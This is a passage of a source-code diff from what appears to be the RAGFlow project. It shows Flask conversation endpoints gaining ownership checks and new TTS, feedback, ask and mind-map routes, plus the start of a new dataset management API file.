obj = {"graph": {}, "mind_map": {}}
|
||||
for id in sres.ids[:2]:
|
||||
ty = sres.field[id]["knowledge_graph_kwd"]
|
||||
try:
|
||||
obj[ty] = json.loads(sres.field[id]["content_with_weight"])
|
||||
except Exception as e:
|
||||
print(traceback.format_exc(), flush=True)
|
||||
|
||||
return get_json_result(data=obj)
|
||||
|
||||
|
||||
@ -1,174 +1,376 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
from flask import request, Response, jsonify
|
||||
from flask_login import login_required
|
||||
from api.db.services.dialog_service import DialogService, ConversationService, chat
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result
|
||||
import json
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@login_required
|
||||
def set_conversation():
|
||||
req = request.json
|
||||
conv_id = req.get("conversation_id")
|
||||
if conv_id:
|
||||
del req["conversation_id"]
|
||||
try:
|
||||
if not ConversationService.update_by_id(conv_id, req):
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
e, conv = ConversationService.get_by_id(conv_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Fail to update a conversation!")
|
||||
conv = conv.to_dict()
|
||||
return get_json_result(data=conv)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
try:
|
||||
e, dia = DialogService.get_by_id(req["dialog_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found")
|
||||
conv = {
|
||||
"id": get_uuid(),
|
||||
"dialog_id": req["dialog_id"],
|
||||
"name": req.get("name", "New conversation"),
|
||||
"message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}]
|
||||
}
|
||||
ConversationService.save(**conv)
|
||||
e, conv = ConversationService.get_by_id(conv["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to new a conversation!")
|
||||
conv = conv.to_dict()
|
||||
return get_json_result(data=conv)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@login_required
|
||||
def get():
|
||||
conv_id = request.args["conversation_id"]
|
||||
try:
|
||||
e, conv = ConversationService.get_by_id(conv_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
conv = conv.to_dict()
|
||||
return get_json_result(data=conv)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
def rm():
|
||||
conv_ids = request.json["conversation_ids"]
|
||||
try:
|
||||
for cid in conv_ids:
|
||||
ConversationService.delete_by_id(cid)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_convsersation():
|
||||
dialog_id = request.args["dialog_id"]
|
||||
try:
|
||||
convs = ConversationService.query(
|
||||
dialog_id=dialog_id,
|
||||
order_by=ConversationService.model.create_time,
|
||||
reverse=True)
|
||||
convs = [d.to_dict() for d in convs]
|
||||
return get_json_result(data=convs)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/completion', methods=['POST'])
|
||||
@login_required
|
||||
#@validate_request("conversation_id", "messages")
|
||||
def completion():
|
||||
req = request.json
|
||||
#req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
|
||||
# {"role": "user", "content": "上海有吗?"}
|
||||
#]}
|
||||
msg = []
|
||||
for m in req["messages"]:
|
||||
if m["role"] == "system":
|
||||
continue
|
||||
if m["role"] == "assistant" and not msg:
|
||||
continue
|
||||
msg.append({"role": m["role"], "content": m["content"]})
|
||||
try:
|
||||
e, conv = ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
conv.message.append(msg[-1])
|
||||
e, dia = DialogService.get_by_id(conv.dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
del req["conversation_id"]
|
||||
del req["messages"]
|
||||
|
||||
if not conv.reference:
|
||||
conv.reference = []
|
||||
conv.message.append({"role": "assistant", "content": ""})
|
||||
conv.reference.append({"chunks": [], "doc_aggs": []})
|
||||
|
||||
def fillin_conv(ans):
|
||||
nonlocal conv
|
||||
if not conv.reference:
|
||||
conv.reference.append(ans["reference"])
|
||||
else: conv.reference[-1] = ans["reference"]
|
||||
conv.message[-1] = {"role": "assistant", "content": ans["answer"]}
|
||||
|
||||
def stream():
|
||||
nonlocal dia, msg, req, conv
|
||||
try:
|
||||
for ans in chat(dia, msg, True, **req):
|
||||
fillin_conv(ans)
|
||||
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
ConversationService.update_by_id(conv.id, conv.to_dict())
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: "+str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:"+json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
if req.get("stream", True):
|
||||
resp = Response(stream(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
|
||||
else:
|
||||
answer = None
|
||||
for ans in chat(dia, msg, **req):
|
||||
answer = ans
|
||||
fillin_conv(ans)
|
||||
ConversationService.update_by_id(conv.id, conv.to_dict())
|
||||
break
|
||||
return get_json_result(data=answer)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
import re
|
||||
import traceback
|
||||
from copy import deepcopy
|
||||
from api.db.services.user_service import UserTenantService
|
||||
from flask import request, Response
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db import LLMType
|
||||
from api.db.services.dialog_service import DialogService, ConversationService, chat, ask
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import LLMBundle, TenantService, TenantLLMService
|
||||
from api.settings import RetCode, retrievaler
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from graphrag.mind_map_extractor import MindMapExtractor
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@login_required
|
||||
def set_conversation():
|
||||
req = request.json
|
||||
conv_id = req.get("conversation_id")
|
||||
if conv_id:
|
||||
del req["conversation_id"]
|
||||
try:
|
||||
if not ConversationService.update_by_id(conv_id, req):
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
e, conv = ConversationService.get_by_id(conv_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Fail to update a conversation!")
|
||||
conv = conv.to_dict()
|
||||
return get_json_result(data=conv)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
try:
|
||||
e, dia = DialogService.get_by_id(req["dialog_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found")
|
||||
conv = {
|
||||
"id": get_uuid(),
|
||||
"dialog_id": req["dialog_id"],
|
||||
"name": req.get("name", "New conversation"),
|
||||
"message": [{"role": "assistant", "content": dia.prompt_config["prologue"]}]
|
||||
}
|
||||
ConversationService.save(**conv)
|
||||
e, conv = ConversationService.get_by_id(conv["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to new a conversation!")
|
||||
conv = conv.to_dict()
|
||||
return get_json_result(data=conv)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@login_required
|
||||
def get():
|
||||
conv_id = request.args["conversation_id"]
|
||||
try:
|
||||
e, conv = ConversationService.get_by_id(conv_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
tenants = UserTenantService.query(user_id=current_user.id)
|
||||
for tenant in tenants:
|
||||
if DialogService.query(tenant_id=tenant.tenant_id, id=conv.dialog_id):
|
||||
break
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of conversation authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
conv = conv.to_dict()
|
||||
return get_json_result(data=conv)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
def rm():
|
||||
conv_ids = request.json["conversation_ids"]
|
||||
try:
|
||||
for cid in conv_ids:
|
||||
exist, conv = ConversationService.get_by_id(cid)
|
||||
if not exist:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
tenants = UserTenantService.query(user_id=current_user.id)
|
||||
for tenant in tenants:
|
||||
if DialogService.query(tenant_id=tenant.tenant_id, id=conv.dialog_id):
|
||||
break
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of conversation authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
ConversationService.delete_by_id(cid)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_convsersation():
|
||||
dialog_id = request.args["dialog_id"]
|
||||
try:
|
||||
if not DialogService.query(tenant_id=current_user.id, id=dialog_id):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of dialog authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
convs = ConversationService.query(
|
||||
dialog_id=dialog_id,
|
||||
order_by=ConversationService.model.create_time,
|
||||
reverse=True)
|
||||
convs = [d.to_dict() for d in convs]
|
||||
return get_json_result(data=convs)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/completion', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("conversation_id", "messages")
|
||||
def completion():
|
||||
req = request.json
|
||||
# req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
|
||||
# {"role": "user", "content": "上海有吗?"}
|
||||
# ]}
|
||||
msg = []
|
||||
for m in req["messages"]:
|
||||
if m["role"] == "system":
|
||||
continue
|
||||
if m["role"] == "assistant" and not msg:
|
||||
continue
|
||||
msg.append(m)
|
||||
message_id = msg[-1].get("id")
|
||||
try:
|
||||
e, conv = ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
conv.message = deepcopy(req["messages"])
|
||||
e, dia = DialogService.get_by_id(conv.dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
del req["conversation_id"]
|
||||
del req["messages"]
|
||||
|
||||
if not conv.reference:
|
||||
conv.reference = []
|
||||
conv.message.append({"role": "assistant", "content": "", "id": message_id})
|
||||
conv.reference.append({"chunks": [], "doc_aggs": []})
|
||||
|
||||
def fillin_conv(ans):
|
||||
nonlocal conv, message_id
|
||||
if not conv.reference:
|
||||
conv.reference.append(ans["reference"])
|
||||
else:
|
||||
conv.reference[-1] = ans["reference"]
|
||||
conv.message[-1] = {"role": "assistant", "content": ans["answer"],
|
||||
"id": message_id, "prompt": ans.get("prompt", "")}
|
||||
ans["id"] = message_id
|
||||
|
||||
def stream():
|
||||
nonlocal dia, msg, req, conv
|
||||
try:
|
||||
for ans in chat(dia, msg, True, **req):
|
||||
fillin_conv(ans)
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
ConversationService.update_by_id(conv.id, conv.to_dict())
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: " + str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
if req.get("stream", True):
|
||||
resp = Response(stream(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
|
||||
else:
|
||||
answer = None
|
||||
for ans in chat(dia, msg, **req):
|
||||
answer = ans
|
||||
fillin_conv(ans)
|
||||
ConversationService.update_by_id(conv.id, conv.to_dict())
|
||||
break
|
||||
return get_json_result(data=answer)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/tts', methods=['POST'])
|
||||
@login_required
|
||||
def tts():
|
||||
req = request.json
|
||||
text = req["text"]
|
||||
|
||||
tenants = TenantService.get_by_user_id(current_user.id)
|
||||
if not tenants:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
tts_id = tenants[0]["tts_id"]
|
||||
if not tts_id:
|
||||
return get_data_error_result(retmsg="No default TTS model is set")
|
||||
|
||||
tts_mdl = LLMBundle(tenants[0]["tenant_id"], LLMType.TTS, tts_id)
|
||||
|
||||
def stream_audio():
|
||||
try:
|
||||
for chunk in tts_mdl.tts(text):
|
||||
yield chunk
|
||||
except Exception as e:
|
||||
yield ("data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: " + str(e)}},
|
||||
ensure_ascii=False)).encode('utf-8')
|
||||
|
||||
resp = Response(stream_audio(), mimetype="audio/mpeg")
|
||||
resp.headers.add_header("Cache-Control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
|
||||
return resp
|
||||
|
||||
|
||||
@manager.route('/delete_msg', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("conversation_id", "message_id")
|
||||
def delete_msg():
|
||||
req = request.json
|
||||
e, conv = ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
|
||||
conv = conv.to_dict()
|
||||
for i, msg in enumerate(conv["message"]):
|
||||
if req["message_id"] != msg.get("id", ""):
|
||||
continue
|
||||
assert conv["message"][i + 1]["id"] == req["message_id"]
|
||||
conv["message"].pop(i)
|
||||
conv["message"].pop(i)
|
||||
conv["reference"].pop(max(0, i // 2 - 1))
|
||||
break
|
||||
|
||||
ConversationService.update_by_id(conv["id"], conv)
|
||||
return get_json_result(data=conv)
|
||||
|
||||
|
||||
@manager.route('/thumbup', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("conversation_id", "message_id")
|
||||
def thumbup():
|
||||
req = request.json
|
||||
e, conv = ConversationService.get_by_id(req["conversation_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Conversation not found!")
|
||||
up_down = req.get("set")
|
||||
feedback = req.get("feedback", "")
|
||||
conv = conv.to_dict()
|
||||
for i, msg in enumerate(conv["message"]):
|
||||
if req["message_id"] == msg.get("id", "") and msg.get("role", "") == "assistant":
|
||||
if up_down:
|
||||
msg["thumbup"] = True
|
||||
if "feedback" in msg: del msg["feedback"]
|
||||
else:
|
||||
msg["thumbup"] = False
|
||||
if feedback: msg["feedback"] = feedback
|
||||
break
|
||||
|
||||
ConversationService.update_by_id(conv["id"], conv)
|
||||
return get_json_result(data=conv)
|
||||
|
||||
|
||||
@manager.route('/ask', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("question", "kb_ids")
|
||||
def ask_about():
|
||||
req = request.json
|
||||
uid = current_user.id
|
||||
def stream():
|
||||
nonlocal req, uid
|
||||
try:
|
||||
for ans in ask(req["question"], req["kb_ids"], uid):
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: " + str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
resp = Response(stream(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
|
||||
|
||||
@manager.route('/mindmap', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("question", "kb_ids")
|
||||
def mindmap():
|
||||
req = request.json
|
||||
kb_ids = req["kb_ids"]
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_ids[0])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Knowledgebase not found!")
|
||||
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
|
||||
chat_mdl = LLMBundle(current_user.id, LLMType.CHAT)
|
||||
ranks = retrievaler.retrieval(req["question"], embd_mdl, kb.tenant_id, kb_ids, 1, 12,
|
||||
0.3, 0.3, aggs=False)
|
||||
mindmap = MindMapExtractor(chat_mdl)
|
||||
mind_map = mindmap([c["content_with_weight"] for c in ranks["chunks"]]).output
|
||||
if "error" in mind_map:
|
||||
return server_error_response(Exception(mind_map["error"]))
|
||||
return get_json_result(data=mind_map)
|
||||
|
||||
|
||||
@manager.route('/related_questions', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("question")
|
||||
def related_questions():
|
||||
req = request.json
|
||||
question = req["question"]
|
||||
chat_mdl = LLMBundle(current_user.id, LLMType.CHAT)
|
||||
prompt = """
|
||||
Objective: To generate search terms related to the user's search keywords, helping users find more valuable information.
|
||||
Instructions:
|
||||
- Based on the keywords provided by the user, generate 5-10 related search terms.
|
||||
- Each search term should be directly or indirectly related to the keyword, guiding the user to find more valuable information.
|
||||
- Use common, general terms as much as possible, avoiding obscure words or technical jargon.
|
||||
- Keep the term length between 2-4 words, concise and clear.
|
||||
- DO NOT translate, use the language of the original keywords.
|
||||
|
||||
### Example:
|
||||
Keywords: Chinese football
|
||||
Related search terms:
|
||||
1. Current status of Chinese football
|
||||
2. Reform of Chinese football
|
||||
3. Youth training of Chinese football
|
||||
4. Chinese football in the Asian Cup
|
||||
5. Chinese football in the World Cup
|
||||
|
||||
Reason:
|
||||
- When searching, users often only use one or two keywords, making it difficult to fully express their information needs.
|
||||
- Generating related search terms can help users dig deeper into relevant information and improve search efficiency.
|
||||
- At the same time, related terms can also help search engines better understand user needs and return more accurate search results.
|
||||
|
||||
"""
|
||||
ans = chat_mdl.chat(prompt, [{"role": "user", "content": f"""
|
||||
Keywords: {question}
|
||||
Related search terms:
|
||||
"""}], {"temperature": 0.9})
|
||||
return get_json_result(data=[re.sub(r"^[0-9]\. ", "", a) for a in ans.split("\n") if re.match(r"^[0-9]\. ", a)])
|
||||
|
||||
878
api/apps/dataset_api.py
Normal file
878
api/apps/dataset_api.py
Normal file
@ -0,0 +1,878 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
import os
|
||||
import pathlib
|
||||
import re
|
||||
import warnings
|
||||
from functools import partial
|
||||
from io import BytesIO
|
||||
|
||||
from elasticsearch_dsl import Q
|
||||
from flask import request, send_file
|
||||
from flask_login import login_required, current_user
|
||||
from httpx import HTTPError
|
||||
|
||||
from api.contants import NAME_LENGTH_LIMIT
|
||||
from api.db import FileType, ParserType, FileSource, TaskStatus
|
||||
from api.db import StatusEnum
|
||||
from api.db.db_models import File
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.user_service import TenantService
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import construct_json_result, construct_error_response
|
||||
from api.utils.api_utils import construct_result, validate_request
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
from rag.app import book, laws, manual, naive, one, paper, presentation, qa, resume, table, picture, audio, email
|
||||
from rag.nlp import search
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils.storage_factory import STORAGE_IMPL
|
||||
|
||||
MAXIMUM_OF_UPLOADING_FILES = 256
|
||||
|
||||
|
||||
# ------------------------------ create a dataset ---------------------------------------
|
||||
|
||||
@manager.route("/", methods=["POST"])
|
||||
@login_required # use login
|
||||
@validate_request("name") # check name key
|
||||
def create_dataset():
|
||||
# Check if Authorization header is present
|
||||
authorization_token = request.headers.get("Authorization")
|
||||
if not authorization_token:
|
||||
return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Authorization header is missing.")
|
||||
|
||||
# TODO: Login or API key
|
||||
# objs = APIToken.query(token=authorization_token)
|
||||
#
|
||||
# # Authorization error
|
||||
# if not objs:
|
||||
# return construct_json_result(code=RetCode.AUTHENTICATION_ERROR, message="Token is invalid.")
|
||||
#
|
||||
# tenant_id = objs[0].tenant_id
|
||||
|
||||
tenant_id = current_user.id
|
||||
request_body = request.json
|
||||
|
||||
# In case that there's no name
|
||||
if "name" not in request_body:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Expected 'name' field in request body")
|
||||
|
||||
dataset_name = request_body["name"]
|
||||
|
||||
# empty dataset_name
|
||||
if not dataset_name:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Empty dataset name")
|
||||
|
||||
# In case that there's space in the head or the tail
|
||||
dataset_name = dataset_name.strip()
|
||||
|
||||
# In case that the length of the name exceeds the limit
|
||||
dataset_name_length = len(dataset_name)
|
||||
if dataset_name_length > NAME_LENGTH_LIMIT:
|
||||
return construct_json_result(
|
||||
code=RetCode.DATA_ERROR,
|
||||
message=f"Dataset name: {dataset_name} with length {dataset_name_length} exceeds {NAME_LENGTH_LIMIT}!")
|
||||
|
||||
# In case that there are other fields in the data-binary
|
||||
if len(request_body.keys()) > 1:
|
||||
name_list = []
|
||||
for key_name in request_body.keys():
|
||||
if key_name != "name":
|
||||
name_list.append(key_name)
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"fields: {name_list}, are not allowed in request body.")
|
||||
|
||||
# If there is a duplicate name, it will modify it to make it unique
|
||||
request_body["name"] = duplicate_name(
|
||||
KnowledgebaseService.query,
|
||||
name=dataset_name,
|
||||
tenant_id=tenant_id,
|
||||
status=StatusEnum.VALID.value)
|
||||
try:
|
||||
request_body["id"] = get_uuid()
|
||||
request_body["tenant_id"] = tenant_id
|
||||
request_body["created_by"] = tenant_id
|
||||
exist, t = TenantService.get_by_id(tenant_id)
|
||||
if not exist:
|
||||
return construct_result(code=RetCode.AUTHENTICATION_ERROR, message="Tenant not found.")
|
||||
request_body["embd_id"] = t.embd_id
|
||||
if not KnowledgebaseService.save(**request_body):
|
||||
# failed to create new dataset
|
||||
return construct_result()
|
||||
return construct_json_result(code=RetCode.SUCCESS,
|
||||
data={"dataset_name": request_body["name"], "dataset_id": request_body["id"]})
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# -----------------------------list datasets-------------------------------------------------------
|
||||
|
||||
@manager.route("/", methods=["GET"])
|
||||
@login_required
|
||||
def list_datasets():
|
||||
offset = request.args.get("offset", 0)
|
||||
count = request.args.get("count", -1)
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
|
||||
datasets = KnowledgebaseService.get_by_tenant_ids_by_offset(
|
||||
[m["tenant_id"] for m in tenants], current_user.id, int(offset), int(count), orderby, desc)
|
||||
return construct_json_result(data=datasets, code=RetCode.SUCCESS, message=f"List datasets successfully!")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
except HTTPError as http_err:
|
||||
return construct_json_result(http_err)
|
||||
|
||||
|
||||
# ---------------------------------delete a dataset ----------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["DELETE"])
|
||||
@login_required
|
||||
def remove_dataset(dataset_id):
|
||||
try:
|
||||
datasets = KnowledgebaseService.query(created_by=current_user.id, id=dataset_id)
|
||||
|
||||
# according to the id, searching for the dataset
|
||||
if not datasets:
|
||||
return construct_json_result(message=f"The dataset cannot be found for your current account.",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
# Iterating the documents inside the dataset
|
||||
for doc in DocumentService.query(kb_id=dataset_id):
|
||||
if not DocumentService.remove_document(doc, datasets[0].tenant_id):
|
||||
# the process of deleting failed
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="There was an error during the document removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# delete the other files
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
# delete the dataset
|
||||
if not KnowledgebaseService.delete_by_id(dataset_id):
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message="There was an error during the dataset removal process. "
|
||||
"Please check the status of the RAGFlow server and try the removal again.")
|
||||
# success
|
||||
return construct_json_result(code=RetCode.SUCCESS, message=f"Remove dataset: {dataset_id} successfully")
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
# ------------------------------ get details of a dataset ----------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["GET"])
|
||||
@login_required
|
||||
def get_dataset(dataset_id):
|
||||
try:
|
||||
dataset = KnowledgebaseService.get_detail(dataset_id)
|
||||
if not dataset:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Can't find this dataset!")
|
||||
return construct_json_result(data=dataset, code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_json_result(e)
|
||||
|
||||
|
||||
# ------------------------------ update a dataset --------------------------------------------
|
||||
|
||||
@manager.route("/<dataset_id>", methods=["PUT"])
|
||||
@login_required
|
||||
def update_dataset(dataset_id):
|
||||
req = request.json
|
||||
try:
|
||||
# the request cannot be empty
|
||||
if not req:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Please input at least one parameter that "
|
||||
"you want to update!")
|
||||
# check whether the dataset can be found
|
||||
if not KnowledgebaseService.query(created_by=current_user.id, id=dataset_id):
|
||||
return construct_json_result(message=f"Only the owner of knowledgebase is authorized for this operation!",
|
||||
code=RetCode.OPERATING_ERROR)
|
||||
|
||||
exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
|
||||
# check whether there is this dataset
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="This dataset cannot be found!")
|
||||
|
||||
if "name" in req:
|
||||
name = req["name"].strip()
|
||||
# check whether there is duplicate name
|
||||
if name.lower() != dataset.name.lower() \
|
||||
and len(KnowledgebaseService.query(name=name, tenant_id=current_user.id,
|
||||
status=StatusEnum.VALID.value)) > 1:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"The name: {name.lower()} is already used by other "
|
||||
f"datasets. Please choose a different name.")
|
||||
|
||||
dataset_updating_data = {}
|
||||
chunk_num = req.get("chunk_num")
|
||||
# modify the value of 11 parameters
|
||||
|
||||
# 2 parameters: embedding id and chunk method
|
